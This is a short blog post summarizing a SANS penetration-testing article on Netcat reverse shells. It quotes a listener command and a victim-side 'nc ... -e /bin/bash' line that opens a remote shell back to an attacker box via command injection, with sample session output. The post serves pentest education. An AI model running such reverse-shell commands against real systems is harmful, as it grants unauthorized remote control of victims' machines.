Reverse shell with Netcat: some use cases

What do you do if you have a Netcat that doesn’t support the -e or -c options to run a shell or your target doesn’t support /dev/tcp?


On SANS Penetration Testing Blog i’ve read a really useful article about Netcat, espacially about using this tool to create a reverse backdoor shell during a penetration test.

The post, written by Ed Skoudis, start with a description of Netcat and a simple example of backdoor shell:

Netcat is fantastic little tool included on most Linuxes and available for Windows as well. You can use Netcat (or its cousin, Ncat from the Nmap project) to create a reverse shell as follows:

First, on your own pen test machine, you create a Netcat listener waiting for the inbound shell from the target machine:

[email protected]# nc -nvlp 443

Here, I’m telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), to listen (-l) on a given local port (-p).

[…]

Then, on the target machine, get the following command to execute (perhaps via command injection in a web app or some other attack technique):

victim$ nc pentestbox 443 -e /bin/bash

This command invokes a Netcat client on the victim, which connects to the attacker’s pentestbox on TCP port 443. The Netcat client then executes /bin/bash (-e /bin/bash) on the victim, connecting that shell’s Standard Input and Standard Output to the network.

[…]

Then, on the pentestbox machine, we’ll see the inbound connection, which we can type commands into as follows (typed commands in bold):

[email protected]# nc -nvlp 443
listening on [any] 443 ...
connect to [AttackerIPaddress] from (UNKNOWN) [VictimIPaddress]
whoami
apache
hostname
victim

Simple, right? But, what if you have a version of Netcat that doesn’t support the -e option?

You could use /dev/tcp to implement a Netcat-like backdoor without using Netcat, but to use that technique, you need to have a bash that supports /dev/tcp. 
However some Debian variants typically has a bash compiled without /dev/tcp support.

And at this point Ed Skoudis show us some techniques to create a reverse shell also in this restricted environments, i suggest to continue the reading on this link:

https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/

Comments